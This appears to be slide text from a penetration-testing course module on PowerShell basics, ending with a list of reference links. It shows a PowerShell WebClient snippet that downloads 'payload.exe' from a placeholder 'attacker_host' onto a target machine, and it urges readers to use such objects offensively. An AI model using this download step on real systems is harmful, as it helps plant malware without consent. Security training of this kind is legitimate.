Penetration Testing Professional 5.0 – Caendra Inc. © 2018

As an example of creating a basic object based off of a .NET class
with the “New-Object” cmdlet, we can use the “Net.WebClient”
.NET system class to download a file to a target system with the
following code:

PS C:\> $webclient = New-Object System.Net.WebClient

PS C:\> $payload_url = "https://attacker_host/payload.exe"
PS C:\> $file = “C:\ProgramData\payload.exe"
PS C:\> $webclient.DownloadFile($payload_url,$file)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 In the example on the previous slide (line by line):
1. We create a variable called “$webclient” which instantiates the
“System.Net.WebClient” .NET class, which is used to create a web client.

2. We then create another variable ($payload_url), which is the url to our

payload.

3. The “$file” variable is then used as the location to which we want to save
the payload on the target system.

4. And finally, we call the $webclient” variable with the “DownloadFile”

method which downloads our payload.exe to the target.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
We’ll see more examples of creating .NET and COM objects in the
module that follows, but for now, experiment and research on
ways you can use the “New-Object” cmdlet to create objects we
can leverage for offensive purposes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And this concludes our lesson on PowerShell fundamentals.

Although we really only scratched the surface in regards to

PowerShell fundamentals, we encourage you to explore its
capabilities and apply those to your offensive work.

In the next Module, we’ll be covering specific toolsets and even

more useful things we can do with PowerShell for our purposes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
CLI Introduction .NET Framework Classes
http://radar.oreilly.com/2013/06/powershell- https://msdn.microsoft.com/en-
command-line-introduction.html us/library/gg145045(v=vs.110).aspx

Get-Help Script Blocks

https://technet.microsoft.com/en- https://docs.microsoft.com/en-
us/library/cc764318.aspx us/powershell/module/microsoft.powershell.core/
about/about_script_blocks?view=powershell-6

Get-Command Pipeline
https://ss64.com/ps/get-command.html https://en.wikipedia.org/wiki/PowerShell#Pip
eline

Cmdlet Overview Modules

https://msdn.microsoft.com/en- https://msdn.microsoft.com/en-
us/library/ms714395(v=vs.85).aspx us/library/dd878324(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Script Modules ForEach-Object
https://msdn.microsoft.com/en- https://docs.microsoft.com/en-
us/library/dd878340(v=vs.85).aspx us/powershell/module/microsoft.powershell.
core/foreach-object?view=powershell-6

Binary Modules Where-Object

https://msdn.microsoft.com/en- https://docs.microsoft.com/en-
us/library/dd878342(v=vs.85).aspx us/powershell/module/microsoft.powershell.c
ore/where-object?view=powershell-6

Manifest Modules Creating Custom Objects

https://msdn.microsoft.com/en-
us/library/dd878337(v=vs.85).aspx https://technet.microsoft.com/en-
us/library/hh750381.aspx

PowerSploit New-Object
https://github.com/PowerShellMafia/Power https://docs.microsoft.com/en-
Sploit us/powershell/module/microsoft.powershell.
utility/new-object?view=powershell-6

Penetration Testing Professional 5.0 – Caendra Inc. © 2018